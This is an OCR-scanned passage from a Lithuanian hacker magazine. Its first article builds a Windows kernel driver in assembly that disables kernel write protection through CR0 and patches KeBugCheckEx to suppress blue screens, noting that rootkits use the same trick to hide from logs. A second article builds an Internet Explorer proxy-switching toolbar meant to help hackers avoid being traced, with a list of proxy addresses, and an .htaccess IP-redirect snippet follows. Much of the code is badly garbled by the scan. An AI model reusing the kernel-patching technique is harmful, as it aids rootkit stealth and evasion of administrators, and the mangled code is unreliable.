neišėjo?! Neskubėkime daryti išvadų! Viskas vyksta pagal 
planą! Kritinių klaidų ignoravimas sukelia ištisą antrinių išimčių 
virtinę, kas šiuo atveju ir vyksta. Pakartojame mūsų komandą 
„r eip = 8042C1E9“ (pakanka spustelėti rodyklę į viršų ir 
<Enter>), ir sistema sugrįžta į normalų režimą! Trečiąjį kartą 
derintuvas nebepasirodo. Pelė šiek tiek stabdo, tačiau su ja 
kuo puikiausiai įmanoma dirbti. Pradėkime rašyti tvarkyklę, 
kuri visa tai darytų už mus. Iš pradžių mums prireiks skeleto, 
kuris atrodo štai taip: 

Pseudotvarkyklės skeletas, kuris nevaldo jokių įrenginių, tačiau 
leidžia mums vykdyti branduolio lygio kodą 


386; noudosime 386 komandos 
model fat, stdkall plokščias atminties modelis, stdcall Iškvietimai  pagol 
nutylėjimą 
code lodo sekcija 
DriverEntry proc Įšjimo į Ivarkyklę taškas 
; „Araiverio“ kodas 


grąžiname  konfiguracios: aidą 
mov ex, 060000182h; STATUS DEVICE. CONFIGURAIION ERROR 


ret ; išeinam 
DriverEntry endp. 
end Driverčity 


Iš tiesų tai ne visai tvarkyklė. Ji nepriima jokių IRP paketų, neaptar- 
nauja jokių įrenginių ir iš viso nedaro nieko, o tik užsikrauna ir 
išsikrauna. Tačiau mūsų užmačiai to visiškai pakaks! 

Visas kodas sukoncentruotas procedūroje DriverEntry (ji yra 
savotiškas C kalbos funkcijos main analogas), kuri yra vykdoma 
bandant užkrauti tvarkyklę ir kuri inicializuoja visus reikalingus 
dalykus. Iš čia galima prieiti prie funkcijos KeBugCheckEx ir savo 
nuožiūra ją modifikuoti. Nepaisant to, kad procedūra DriverEntry 
vykdoma branduolio lygyje su maksimaliomis privilegijomis, ban- 
dymas pataisyti mašininį kodą sukelia priėjimo pažeidimą. Taip 
suveikia netyčinio branduolio nulaužimo su nekorektiška tvarkykle 
apsauga. Kaip ją atjungti? 

Pirmasis kelias — per sisteminį registrą. Šakoje HKLM|SYSTEMI 
CurrentControlSet|Control|SessionManager|Memory Manage- 
ment sukuriame REG DWORD tipo raktą EnforceWriteProtection 
Ir priskirame jam O reikšmę (tai galima padaryti ir aplikacijos 
lygyje). Viskas! Rašymas į branduolį jau leidžiamas! Beje, Soft/CE 
būtent taip ir veikia. 


paprastai po BSOD ateina mirtis 


Antrasis kelias — puslapių remapinimas. Puslapio, kuriame 
yra KeBugChecKEx, fizinį adresą atvaizduojame į savo proceso 
virtualią adresų erdvę, iškviesdami funkciją NtMapViewOfSec- 
tion, priskirdami visas mums reikalingas teises. Remapinimas at- 
liekamas išimtinai branduolio lygyje, tačiau į atvaizduotą puslapį 
galima kreiptis net iš taikomojo lygio. Puikumėlis! Šiuo principu 
veikia daugelis ugniasienių ir kitų programų, kurioms reikia 
perimti branduolines funkcijas (pavyzdžiui, rootkitai). Išsamiau 
apie tai gali rasti čia: http://www.stanford.edu/-—stinson/misc/ 
curr res/nt hooking.txt. 

Trečiasis kelias — crO registro vėliavėlės WP nunulinimas. Tai toks 
purvinas triukas su ištisa prieštaravimų ir reklamacijų svita, bet 
mūsų tikslams jis puikiai tinka. Mes juo ir pasinaudosime kaip 
pačiu paprasčiausiu ir greičiausiu variantu, kuris sutelpa į viso labo 
3 (!) mašinines komandas: 

Branduolio apsaugą nuo rašymo atjungiantis kodas 


mov e0x, 10 


and ex, OFFFEFFFFh 


; valdantį registrą c0 užkiaunome į e0x 
; anuliuojome WP bitą, kuris draudžio rašymą 


mov 0, eax ; alnaujiname valdantį registrą d0 


Atitinkamai, norint šią apsaugą vėl įjungti, reikia nustatyti tą patį 
WP bitą, ką ir daro tolimesnės mašininės komandos: 
Branduolio apsaugą įjungiantis kodas 


mov 604, d0 ; valdontį registrą c10 užkaunome į enx 
or eax, 10000h |; atstatome įrošymą draudžiantį WP bitų 
mov 0, e0x atnaujiname valdantį registrą 0 


Politiškai korektiška programa turėtų ne šiaip tiesiog išjungti/ijungti 
rašymo apsaugą, 0 įsiminti einamą WP bito būseną prieš jo 
pakeitimą, o po to šią būseną sugrąžinti, priešingu atveju apsaugą 
galima netyčia įjungti pačiu netinkamiausiu metu, rimtai pakenki- 
ant virusui arba rootkitui. 
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517 Dnesio!Su VyMore toks viukasre" [Pašalinimas ir bausmė] 
Ar visada padeda KeBug- 

šių, dėl ko pakimba wisa CheckEx šuntavimas? Kiek 

Speraenė sstema. Rkiuaiejugaima = tai saugu? Tai labai pa- 

Tą 4 Nisas ies, o branduolio jašymo | VOlInga, Juo labiau, kad 


Agtiper sisteminį mginą, | padeda anaiptol ne visada. 
Pavyzdžiui, aptarkime kitą 
iš branduolio pasiskolintą 


kodo pavyzdį: 


nereikia dayti 


Kodo fragmentas, kuiiame KeBug. 
Šuntavimos baigiasi labai liūdnai 


00565201 tall BAllocatePoolWithTog ; atminties išskyrimas iš 
polo 

00565206 np ok, ebx  ;  palikriname, ar atmintis išskirta 
sėkmingai 

00565208 mov dsdword 56BAB4, e0x 

00565200 įnz short loc 56521C > mums davė atminties! 
tiesiog puiku! 

0056520F push eb 

00565210 push ehx 

00565211 push 6 ; atminties negavome 

00565213 push 5 + iškeliaujame į dausas 

00565215 push 61h Ž 

00565217 cal KeBuglhecktx r 

0056521C loc 56521C (CODE XREF: sub 565101 +46 

0056521C les eu, [ebp+-va: (Į pralęsiame normalų 
vykdyną 

0056521F push ebx 

00565220 push eK 


Sistema atmintį išskiria iš bendro fondo (pool), ir jeigu šis 
išskyrimas pavyko sėkmingai, tuomet toliau viskas vykdoma 
normaliai, priešingu atveju pasirodo mėlynasis ekranas. Tarkim, 


geriausia prekės reklama 


mėlynasis ekranas 


priešmirtinis VMWare pranešimas, kurį Ii dažnai parodo, kai su ja eksperimentuojama 


mes užtrumpinome KeBugCheckEx, ir kas tada? Mums nedavė 
atminties, o mes vykdom toliau, lyg nieko ir nebūtų nutikę, kreip- 
damiesi į rodyklę, kuri rodo į niekur. Susidaro ištisa antrinių išimčių 
virtinė, o visos duomenų struktūros pavirsta jovalu, dėl ko sistema 
galutinai nulūžta. Štai taip. 


[Ko nemoka NTFS] Siekiant minimizuoti sistemos kracho 
pasekmes, NT turi specialius call-back'us. Bet kokia tvarkyklė 
gali iškviesti funkciją KeRegisterBugCheckCallback ir užregistruoti 
specialų apdorotuvą, kuriam mėlynojo ekrano pasirodymo metu 
bus perduotas valdymas. Tai leidžia korektiškai sustabdyti įrangą, 
pavyzdžiui, priparkuoti kietojo disko galvutes. Juokauju! Tačiau 
failų sistemos tvarkykle! išvalyti savo buferius tikrai nepakenktų, 
juo labiau, kad galima patikrinti šių duomenų vientisumą pa- 
gal CRC arba bet kokiu kitu būdu. Sklando gandai, kad NTFS 
būtent taip ir pasielgia. Kur gi ne! Aš disasembliavau ntfs.sys 
ir neradau ten jokių KeRegisterBugCheckCallback iškvietimo 
požymių! Avarijos metu NTFS buferiai lieka neišvalyti, o pačią 
failų sistemą gelbsti tik transakcijų galimybė, kas garantuoja 
visų operacijų atomiškumą, t.y. operacija arba atliekama, arba 
ne. Failo įrašo atnaujinimas negali būti pusiau atliktas, todėl, 
priešingai nei su FAT, NTFS sistemoje nesusidaro pamesti klas- 
teriai (... praktiškai nesusidaro) 


Užtrumpinti KeBugCheckEx galima įvairiai. Pats 
teisingiausias (ir patikimiausias!) būdas — nus- 
tatyti jos adresą peržiūrint importo lentelę, tačiau 
tai pernelyg ilgai trunka, per daug neskaidru, 
nuobodu ir vargina. Kur kas paprasčiau pakišti 
jau paruoštus adresus, griežtai juos įrašant savo 
programoje. Šio sprendimo trūkumas tame, 
kad kituose kompiuteriuose jis neveiks. Pakaks 
įdiegti (arba išmesti) kokį nors pataisymų paketą 
ar pereiti prie kitos sistemos versijos, kaip 
visi adresai tuojau pat pasikeis, dėl ko viskas 
siaubingai pakibs. Nepaisant to, po ranka turint 
tvarkyklės išeities tekstus, ją visada galima patai- 
syti ir perkompiliuoti. Taigi naminiam vartojimui 
toks sprendimas visai priimtinas. Pagrindinė 
subtilybė čia tame, kad mes neturime liesti 
pirmojo KeBugCheckEx funkcijos baito, kadangi 
jį jau „palietė“ SoftiCE. Taip pat elgiasi ir kitos 
hakeriškos programos (pavyzdžiui, API šnipai), 
kurie čia įkurdina komandą INT 03 (op-kodas 
— CCh), iš anksto išsaugodami ankstesnį turinį 
Kur nors kitoje vietoje. 

Ok, praleiskime pirmąją komandą (PUSH EBP), 
0 nuo antrosios pradėkime įterpimą. Norėdami 
subalansuoti steką ir atsverti PUSH EBR sukoman- 


duojame POP EAX, o po to arba įmp į RET 14h, arba pats RET 
14h, Pastarasis variantas trumpesnis ir elegantiškesnis, atliekamas 
štai taip: 

KeBugCheckEx užtrumpinantis kodas 


mov duo pti DS:[80428F14h-+ 1), 14C258h 


Čia 8042BF14h — funkcijos KeBugCheckEx pradžios adresas 
(visose mašinose skirtingas), 1 — instrukcijos PUSH EBP ilgis, o 
14C258h — mašininis kodas, kuris reiškia dviejų komandų seką: 
POP EAX (58h)/RET 14h (C2h 14h O0h). 

Apjungus visus komponentus į vieną visumą, gauname štai ką: 
Anti-BSOD priemonė, prieš vartojimą suplakti 


386 
model lai, sidcall 


Mėlynasis ekranas mokamam intemeto telefone 


DiiverĖntiy proc 
mov eax, G0  ; valdantį registrą a užkrauname į e0x 
mov ebx, eax  ; ebx registre išsaugome WP bitą 
and eax, OFFFEFFFFh ; anuliuojame WP bitą, kuris draudžia 
mov c0, eax  ; atnaujiname valdantį registrą c0 


mov dwod pir: 0S:[80428F14h +-1], 14C258h 140256 
; „užirumpinom“ KeBugCheckėx 


; ūtstatome WP bitą 
; STATUS DEVICE CONFIGURATION ERROR 


mov cr0, ehx 
mov eax, 0C0000182h 
Tel 

Driverkntry endp 

end DriverEntry 


Štai kokia maža tvarkyklė, tačiau kiek daug duomenų ji gali 
išgelbėti! Telieka ją sukompiliuoti. 

Asembliavimo ir linkinimo raktai (naudotas MASM paketas iš NT 
DDK) 


ml /nologo /c /coff nobsod.asm. 
link /driver /base:0x10000 /align:32 /out:nobsod.sys: /subsystem.native 


Jeigu viskas buvo padaryta teisingai, tuomet diske bus sukurta 
byla nobsod.sys, kurią mes užkrausime su dinaminiu užkrovėju 
Ww2k load. Be abejo, užkrovėjas pradės keiktis, atseit, ERROR ir 
tvarkyklė Iš viso nesikrauna, tačiau taip ir turėtų būti. Viskas nor- 
malu! Juk mes grąžinome STATUS DEVICE CONFIGURATION ER 
ROR kodą! 

Užkraukime tvarkyklę-žudikę, kad patikrintume, ar susitvarkys 
su ja mūsų anti-BSOD priemonė, ar ne. Keletą kartų pa- 
sirodo Soft/CE jeigu jis įdiegtas). Tai bent įkyruolis! Vyk jį lauk, 
spausdamas „x“ arba Ctrl+D, Vis tiek mėlynasis ekranas jau 
nebepasirodys! Sistema žiauriai stabdo, tačiau veikia. Blogai 
tai, jog dabar NT niekaip negali signalizuoti, kad įvyko sistem- 
inis sutrikimas ir kad reikia kuo greičiau krautis savo žaislus ir 
padaryti shutdown. Beje, kodėl gi negali signalizuoti?! | mūsų 
KeBugCheckEx pataisymą įdėti porą asemblerio eilučių, kurios 
pyptels su garsiakalbiu (speaker) arba ką nors sugros — visiškai 
paprasta. Iš esmės netgi būtų galima BugCheck kodus padalinti 
į kategorijas, kiekviena kurių atitiktų savas pyptelėjimų skaičius. 
Pavyzdžių toli ieškoti nereikia. Jų galima rasti bet kuriame DOS 
viruse. Branduolio lygyje sisteminio garsiakalbio programavimo 
technika nė kiek nepasikeitė. 

Čia dar daug ką galima padaryti, svarbiausia — turėti fantazijos! 


[Gyvenimas po BSOD] Mes pergyvenome pačią baisiausią 
katastrofą — BSOD, po kurios mums niekas nebaisu! Žinoma, 
praktikuoti tokius dalykus serveryje nėra labai išmintinga, tačiau 
darbo stotyse tai visiškai priimtina. Patikrinta praktiškai! Beje, 
kai kurie virusai, kirminai ir rootkitai savo buvimui nuslėpti 
naudoja panašią techniką. Nekorektiškai parašytas virusas gali 
sukelti mėlynąjį ekraną, po ko sisteminiame žurnale atsiras 
atitinkamas įrašas, padėsiantis administratoriui susitvarkyti 
su problema. Jeigu užtrumpintume KeBugCheckEx, tuomet 
kompiuteris tiesiog be priežasties stabdys (arba pakibs), tačiau 
loguose nieko neatsiras! 
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Skydelis proksiams 
a Hakeriškos „Internet Explorer“ įrankių 
Ž juostos („toolbar“) sukūrimas 


TIKRIAUSIAI KIEKVIENAS JAU SPĖJO 
NE KARTĄ SAVO KAILIU PATIRTI, KAD 
SAUGUMAS REIKALAUJA DIDELIŲ LAIKO 
SĄNAUDŲ IR ENERGIJOS TIEK INTER- 
NETE, TIEK IR REALIAME GYVENIME. 
TU TIK PAGALVOK, JUK PO KIEKVIENO 
PRISIJUNGIMO REIKIA ĮVEDINĖTI ICG 
SLAPTAŽODĮ, ATIDARINĖTI TRISDEŠIMT 
GELEŽINĖS DURIS SAUGANČIŲ SPYNŲ, 
š TIKRINTI IR NARŠYKLEI NURODYTI NAUJĄ 
PROXY. VIENU ŽODŽIU, UŽSIKNISIMAS. 
PANAUDODAMAS ELEMENTARIUS PRO- 
GRAMAVIMO |GŪDŽIUS, AŠ PASISTENG- 
SIU KIEK PAGERINTI ŠIĄ S PADĖTĮ, 
TAIP PADARYDAMAS GYVENIMĄ ŠIEK TIEK 
KOMFORTABILESNIU. 


UNITS 


CREATION 


Hakeriui svarbiausia — saugumas (na ir, be jokios abejonės, 
priežastis, dėl kurios prireikė šio saugumo — red.past.). Jeigu 
tavo IP bus aptiktas tuose loguose, kur jo neturėtų būti, tai tave 
suras ir, patikėk manim, maža nepasirodys. Todėl kiekvienam 
hakeriui, be viso kito, privalomi ir tinkliniai kontraceptikai, 
kurių šiandien prikurta devynios galybės. Tai ir VPN, ir socks, 
ir proxy serveriai. Tegu proxy serveriai ne tokie saugūs, tačiau 
juos surasti paprastai nebūna sunku, su jais dirba beveik visos 
naršyklės. Tačiau jeigu tu vieną proxy naudosi tol, kol sulauksi 
anūkų, saugumo tarnybos vis tiek susitars su serverio savininku 
ir vėl pridarys tau nemalonumų, Todėl proxy serverius reikia keisti 
reguliariai (karderiams tai daryti tekdavo kas 15 minučių, kiekvi- 
enam vartotojui jie turi po atskirą proxy — red.past.). Tačiau 
tam tenka kiekvieną kartą |įsti į naršyklės nustatymus, nuspausti 
šimtą mygtukų, kas beprotiškai nepatogu. O tu įsivaizduok, 
kad proxy serverio pakeitimas gali būti atliekamas paspaudus 
vieną vienintelį mygtuką, Ir šis mygtukas įkurdintas šalia adreso 
eilutės. Finale tu esi laisvas ir visiškai atsipalaidavęs. Kaip gi tai 
įgyvendinti? Idealus būdas būtų sukurti nuosavą įrankių juostą 
(toolbar). Tai toks gudrus skydelis, kuris tavo mėgiamame IE 
Visada bus po ranka. 


[Sušeriam] /nternet Explorer — tai iš nedidelių plytelių suręstas 
statinys. Tokia plyta gali būti įrankių juosta arba meniu, ji vis tiek 
padaryta iš tos pačios medžiagos ir nuo savo brolių mažai kuo 
skiriasi. Supranti, kurlink aš suku? IE naršyklėje viskas yra vienos 
rūšies, o visi įskiepiai (plugins) realizuojami su COM technologija. 


Kaip tu tikriausiai žinai, pagrindi- 
nis COM yra sąsaja. Sąsaja — tai 
visiškai abstrakti sąvoka. Joje 
apibrėžti visi metodai, o real- 
izacijos nėra. Tai lyg maketas, 
kurį mes turime įgyvendinti. 
Manau, tai suprantama. Ką gi, 
judame toliau. Krovimosi metu 
naršyklė iš sisteminio registro 
nuskaito informaciją apie savo 
įskiepius: kur yra, kokio tipo ir 
taip toliau. Po to ji iš eilės užkrauna kiekvienos įrankių juostos 
DLL ir iškviečia eksportuojamą funkciją D/lGetClassObject, gauna 
rodyklę | IClassFactory sąsają, kurios pagrindinė užduotis yra 
užregistruoti ir atregistruoti mūsų COM serverį. Iš /ClassFactory 
Ji iškviečia funkciją Createlnstace ir gauna 2 rodykles į /OleCom- 
mandTarget ir IObjectWithSite sąsajas. IObjectWithSite sąsaja, 
kuri nors ir implementuoja tik du metodus (SetSite ir GetSite), 
Įsklepio sukūrime atlieka žymų vaidmenį. Pagimdžius įrankių juostą 
naršyklė iškviečia metodą SetSite. Funkcija SetSite turi būti visuose 
Įskiepiuose, kadangi joje mes turime gauti /WebBrowser2 sąsają, 
kuri yra pagrindinė naršyklės svirtis, I/nputObjectSite sąsają, per 
kurią mes įgyvendinsime formos kontrolę, bei loleWindow sąsają: 
Išjos reikia iškviesti funkciją GetWindow, kuri mums grąžina mūsų 
formos handle'ą. Su Overylnterface iš punkSite gauname Ilnpu- 
tObjectSite sąsają. Analogišką operaciją atliekame su /O/eWindow 
sąsaja, iš karto iškviečiame GetWindow ir sukuriame formą. Norint 
turėti IWebBrowser sąsają, reikia iš punkSite gauti IOleComrhand- 
Target sąsają, o išjos ištraukti IServiceProvider ir iškviesti funkciją 
OuerySemvice. Kam taip sudėtingai, kodėl negalima iš karto panau- 
doti Ouerylnterface? Ogi todėl, kad jeigu kitas įskiepis užsimanys 
kreiptis į mūsų įrankių juostą ir gaus jos sąsają, tai jis pamatys 
špygą taukuotą. SetSite realizaciją gali pamatyti žemiau. 


Nori daugiau sužinoti 
apie COM technologiją? 
Pradėk nuo čia: http! 
ww. /articleloom! 
Introcomn.xni 


Jei tau staiga kažkas 
neišeina arba tu tesiog Nor! 
man mestelėti kokią nors 
originalią idėją, tai rašyk, 
nesidrovėk. 


Funktja SetSite 
fundion TProxyBar.SetSite(const plnkSite: |Unknown): HResult; 


v 
Olewind:1OleMindow; 

begin 
Ele Ędk Fomat Yew beb if pUnkSite< =nil then 
|169.229.50.10:3128 begin 
169. 229 113 d pUnkSite Oueylnterface(IlnputObį 
169.229. a 
168:239. 30 113128" edSite Site); 


169.229.50.5:3128 
292.114.65.100:80 
1417 „114. 220 22928 80 


if SUCCEEDED(pUnkSite.Oveylnte:f 
ace(IOlWindow Olevind)) then. 


begin 
Olewind. 
GeMindo(PareniWind); 
Olewind. Release; 
192. 76. 71.88:80 2 
193.136.191.25:3127 Makeform|(ParentWnd); 
193.136.191.26:3124 end; 
193.136. 205, 232:3128 K 
193.232.27.246:3124 plinkSite.. Relensa; 
SS MnNuKS |m 
SA Rest := S OK 


53:11 
183: 55.112.41:3128 end; 


Aš nepradėjau terliotis su WinAP! 
ir naudojau VCL. Taip, žinau, hak- 


mano nedidilis proxy serverių sarašas | eriaj taip nedaro, tačiau VCL valdo 


Try the BizTaik Server 2006 Community Technology Preview 


Nav This Week LEZA asi is 
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msdn.com — geriausias IE programuotojo draugas 


pasaulį. Be jo Delphi nebūtų tokia populiari. Jeigu užsimanysi visa 
tai realizuoti su švariu api, tau teks kaip reikiant pakrutinti smeg- 
enis, tačiau aš tavimi tikiu :). Grįžkim prie mūsų sąsajų. 

Antra iš /ObjectWithSite paveldėta funkcija yra GetSite, naršyklė ją 
visada iškviečia po SetSite. Joje mes turime naršyklei grąžinti jos 
sąsają, kurią Jis mums davė pažaisti prieš tai buvusioje funkcijoje. 
Tiesiog iškviečiam Site.Ouerylnterface ir grąžinam jai jos sąsają, 
tegu paspringsta! Toliau sąraše eina /DeskBand. Ką gj, kolega, 
laikykite skalpelį, bandysime skrosti :). Jeigu tu iš pradžių nuspren- 
dei išstudijuoti išeities tekstus, tuomet jau spėjai pastebėti funkciją 
pavadinimu GetBandlnfo, kuri užima kur kas daugiau vietos nei 
kitos. Išjos naršyklė gauna informaciją apie skirtingus įrankių juostos 
parametrus, tokius, kaip gabaritai, antraštė ir t.t. Vietoje parametrų 
naršyklė jai perduoda mūsų skydelio ID, atvaizdavimo būdą Ir pbdi 
struktūrą. Būtent ją mes ir turime užpildyti. Beje, pdbi.dwMask 
užpildyti nereikia, tai parodo, ką naršyklė nori iš mūsų sužinoti. 
Mes patikriname, ar naršyklė šią minutę iš mūsų nereikalauja kokių 
nors parametrų, ir užpildome tik tuos punktus, kurių jai reikia. 
Kas tai yra ptMaxSize ir ptMinSize gali suprasti net ir paskutinis 
bukagalvis, o apie likusius parametrus aš papasakosiu šiek tiek 
išsamiau: 

dwModeFlags — kintamasis, kuris apibrėžia mūsų įrankių Juostos 
elgseną. Viso galima naudoti tris efektus: pažingsninį dydžio keitimą 
vertikaliai, kur už žingsnį atsako pt/ntegral, naudoti nestandartinę 
spalvą ir atvaizdą, taip vadinamą paskendusiu pasirodymu (msdn'e 
gali rasti vėliavėlių pavadinimus). 


IEi 
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ptActual — tai idealus tavo skydelio dydis; IE bet kokiomis 
salygomis stengiasi pasiekti būtent jį, ir jeigu įrankių juostai netruk- 
do kiti kaimynai, tai ji bus įkelta atitinkamai pagal šį parametrą. 
wszTitle — tai įrankių juostos caption (pavadinimas). Kadangi tai 
nestring tipas, eilutės tipo reikšmę reikia transformuoti į WideChar 
tipą, kas daroma su funkcija StringToWideChar. StringToWideChar 
(Caption, (Dpdbi.wszTitle, Length(Caption) + 1); 

crBkgnd — įrankių juostos spalva, kuri bus priskirta tik tuomet, 
jeigu tu dwModeFlags priskirsi DBIMF BKCOLOR reikšmę. 

Štai nedidelis funkcijos GetBand/nfo fragmentas, kad tau būtų 
aišku, apie ką kalbu: 


1 (pdbi.dwMask AND OBIM MINSIZĘ < > 0 


hen begin 
pdbi.ptMinSize.x = MintSize; 
pdbi.ptMinSize.y :— MinYSiae; 


end; 


Toliau eina funkcijos ShowDW ir CloseDW. Pirmoji, priklausomai 
nuo fshow kintamojo, parodo ir paslepia formą, taip pat su funkcija 
OnFocusChangelS aktyvuoja ir deaktyvuoja fokusą iš anksčiau 
išsaugotos naršyklės sąsajos. Su antrąja funkcija langą sunaiki- 
name. ResizeBorderDW atlieka kažkokias baisias manipuliacijas 
su mūsų langui išskirto rėmelio riba, tačiau mes šios galimybės 
atsisakysime ir padarysime Result:=E NOTIMPL, taip pranešdami 
naršyklei, kad šios funkcijos mes nerealizavome. Iš visų sąsajų 
reikėtų išskirti /ContextMenu, be jos įrankių juosta neveiks. Mes 
galime nesinaudoti jos implement'ais, tačiau tokiu atveju įrankių 
juosta praras tam tikrą funkcionalumą. Kaip matyti iš pavadinimo, 
IContextMenu — tai sąsaja, kur aprašytos darbo su kontekstiniu 
meniu funkcijos. Ką gi, važiuojame pirmyn. Funkcijoje OueryCon- 
textMenu mes turime įterpti visus pageidaujamus meniu punktus, 0 
poto su InvokeCommand apibrėžti, kas vyks nuspaudus kiekvieną 
iš jų. Peržiūrėk diske pateiktus išeities tekstus, ten viskas labai 
paprasta ;). 


Štai berods ir viskas, ko reikia elementariai įrankių juostai sukurti, 
tačiau kadangi mes naudosime įvedimo iš klaviatūros kompo- 
nentus (Memo, Edit ir t.t.), mums reikės realizuoti fokusą, nes 
priešingu atveju mes paprasčiausiai negalėsime įrankių juostoje 
iš klaviatūros gauti jokios informacijos. Darbo su fokusu metodai 
apibrėžti IInputObject sąsajoje. 

UlActivatel0, kaip rašo MSDN, aktyvuoja/deaktyvuoja objektą, 
tiksliau šnekant, ji priklausomai nuo kintamojo fActivate keičia 
fokusą. Tiesiog darome SetFocus, jeigu fActivate — tiesa (true), ir 
nieko nedarom, jeigu fAictivate — netiesa (false). 

HasFocuslO parodo, ar egzistuoja klavišinis fokusas, ir, priklausomai 
nuo gauto atsakymo, daro išvadas. Įgyvendinama lengvai: tiesiog 
į ją grąžiname fokusą ;). 

TranslateAcceleratorlO — čia reikia perimti <TAB> klavišo 
paspaudimą ir pasiųsti fokusą į tolimą kelionę per įrankių juostų 
platybes. 

Be viso kito, nereikėtų pamiršti: kad pas mus veiktų COM serveris, 
mums reikia sukurti jo GUID. GUID — tai toks serverio ID, kuris 
visoje Visatoje Ir visuose išmatavimuose užtikrina jo unikalumą. Tai 
pasiekiama manipuliuojant su data irlauku bei aparatūrinės įrangos 
parametrais. Delphi aplinkoje viskas jau padaryta už mus, todėl 
nuspaudus <CTRL+SHIFT+G> kursoriaus vietoje bus patalpintas 
sugeneruotas GUID. Be jo užregistruoti įrankių juostą tau nepavyks. 


Norint užregistruoti bet kokį COM serverį, sisteminiame registre 
reikia sukurti keletą šakų. Štai jos: 

HKEY CLASSES ROOTICLSID|[GUID]|. Čia mes į reikšmę pagal 
nutylėjimą įrašome COM serverio pavadinimą. Mūsų atveju tai 
yra ProxyBar. 

HKEY CLASSES ROOT|CLSID|(GUIDJ|InProcServer32. 
Neužsiciklinkime ties srautiniu COM modeliu, todėl į Threading- 
Model raktą įrašykime Apartment. Jeigu tau įdomu, kas tai per 
žvėris, tuomet tau reikėtų paieškoti literatūros apie COM, kurios 
yra daugybė. Manau, kad su paieška problemų iškilti neturėtų. 
HKEY CLASSES ROOTICLSID|(GUID]Įmplemented Categories! 
Ilrankių juostos tipas]. Šiame rakte nereikia nieko rašyti, jį 
tiesiog reikia sukurti. Jis apibūdins mūsų COM serverį. Mūsų 
atveju įrankių juostos tipas — DeskBand, o jos GUID yra GUID 
100021492-0000-0000-C000-000000000046), ką labai 
lengva atsiminti :). 

Registracijos kulminacija yra mūsų COM serverio kaip įrankių 
juostos apibrėžimas. HKEY CURRENT USER|Software|Microsoft| 
Internet Explorer|Toolbar|WebBrowser šakoje sukuriame tuščią 
ĮGUID] šaką ir pradedame kitą sulčių pakuotę. 

Tačiau ką daryti su tais [GUID]? Kaip gi atidaryti registro raktus, juk 
jie yra string, o čia TGUID? Ogi lengvai! Yra tokia funkcija GuidTo- 
String. Pasinaudok ja pagal paskirtį. 

Nepamiršus išregistravimo procedūroje realizuoti anksčiau sukurtų 
raktų pašalinimo, galima manyti, kad žvėriukas paruoštas ir kad jį 
galima pradėti mokinti gyventi ;). 


[Išjodinėjam] Forma paruošta, tačiau ji tuščia ir naudos 
iš jos ne daugiau, nei iš bealkoholinių sulčių. Teks tokią 
padėtį taisyti. Formoje įkurdinsime ComboBox ir mygtuką. 
ComboBox'e bus pats piroxy serverių sąrašas, 0 su mygtuku 
mes keisime proxy į mūsų pasirinktą variantą. Norint pakeisti 
IE naudojamą proxy, daug vargti nereikia, viso labo tereikia 
pakeisti registro raktą HKEY CURRENT USER|Software|Mi- 
crosoft|Windows|CurrentVersion|Internet Settings ProxyServer 
į proxy:port pavidalo reikšmę bei pakeisti šalia esantį raktą 
ProxyEnable į 1. Ir viskas! Čia problemų iškilti neturėtų. 
Kadangi ComboBox'e bus saugomi visi proxy serveriai, mes 
šį sąrašą turime išsaugoti ir po to sukuriant įrankių juostą 
jį užkrauti. FormCreate įvykyje aprašyk Combobox1.ltems. 


Snagtt, DM Bar ir Google bar įrankių juostos 


| IB] IB D 3 
| ProxyBar [1233354 


| Address 


mūsų nuostabi įrankių juosta, skirta greitam proxy serverio pakeitimui 


vww.lrs.lt] 


LoadFromFile('C:|Proxy.txt'), po ko proxy serveriai atsi- 
duria sąraše, o išsaugoti juos reikia įvykyje FormDestroy su 
Combobox1.ltems.SaveToFile. Štai ir viskas, proxy serverių 
keitimo įrankių juosta baigta. 

Dabar aš turiu dl! bylą, tačiau prieš pradedant džiaugtis gyvenimu 
Ir pabaigiant taikiai ant tavo stalo padėtus nealkoholinius gėrimus, 
Ją reikėtų užregistruoti. Tai daroma standartiniu Windows įrankiu 
regsvr32. 


Šiai taip užkrauname mūsų įronkių juostą 
tegsvr32 Cproybar.dll 

O šiai taip: iškraunam 

regsvi32 0 Cproybar.dll 


Kadangi registracija atliekama per UpdateRegistry metodą, čia 
galima įterpti Ką nors panašaus į ShowMessage(„Didelis ačiū 
už registraciją') arba iš karto nukreipti į gamintojo svetainę. 
Beje, apie paukštelius. Norint gauti naršyklės valdymą, neva 
tai nukreipimas arba puslapio turinio gavimas, tau prireiks 
susitvarkyti su IWebBrowser2 sąsaja. Manau, kad tau jau teko 
susidurti su TwebBrowser komponentu. Visos jame esančios 
funkcijos kaip tik pasiskolintos iš /WebBrowser2. Tu gali nau- 
dotis funkcijomis Navigate, Stop, Refresh ir būti laimingu, 
tačiau atmink, kaip negalima daryti: /E.Navigate(Url, O, O, 0, 
0); čia būtina apibrėžti OleVariant tipo kintamąjį ir priskirti jam 
reikšmę: /E.Navigate(Url, X, X, X, X); Jokių nulių! 


[„Dabar man sausa ir patogu“ (C)] Taip mes su tavimi beveik 
be vargo sukūrėme puikią įrankių juostą. Aš įsitikinęs, kad tu 
jau degi noru kaip nors ją papildyti, pridėti mini proxy tikrintoją, 
atsakymo laiko patikrinimą ir kitus reikalingus dalykėlius. 
Tačiau, kaip tu tikriausiai supranti, IE skirtų įrankių juostų 
kūrimas proxy serverių pakeitimu neapsiriboja! IE naršyklėje 
galima lengvai keisti absoliučiai bet kokius nustatymus, ka- 
dangi jie, laimė, saugomi registre. Pavyzdžiui, galima sukurti 
Security Explorer Bar, kur vienu pelės klavišo paspaudimu būtų 
galima pakeisti sausainukų (cookies) priėmimo parametrus 
arba išvalyti istoriją. Viskas, ko tau reikia — msdn, šis kuklus 
straipsnis ir, be jokios abejonės, šiek tiek vaizduotės. Tikiuosi, 
kad tave sudominau. 


Kaip su .htaccess byla būtų galima paprastus varto- 
tojus nukreipti į vieną puslapį, o adminą — į kitą? 
Atpažinimas atliekamas pagal IP adresą. 


Skirtingų puslapių pateikimas priklausomai nuo lankytojo 
IP adreso įgyvendinamas štai taip: 


SetEnvlf REMOTE ADR <:eikiamos IP adresas > REDIR="redir" 


RewiteCond Y6(REDIR) redir 
RewriteRule “ /$ /<reikiamaspuslopis html > 


Pavyzdžiui,  nukreipkime iš 21259.0.29 adreso atkeliaujončius lonkytojus I 
puslapį hocker.him: 

SetEnvlf REMOTE ADDR 212.59.0.29 REDIR=""edir“ 

RewriteCond 96 (REDIR) tedir 

RewiteRule “ /5 /hacker.html 


Galiu prieiti prie nutolusiame serveryje įdiegto 
phpMyAdmin skripto. skripto versijoje klaidų 


labai norėtųsi nutolusiame serveryje Koman- 
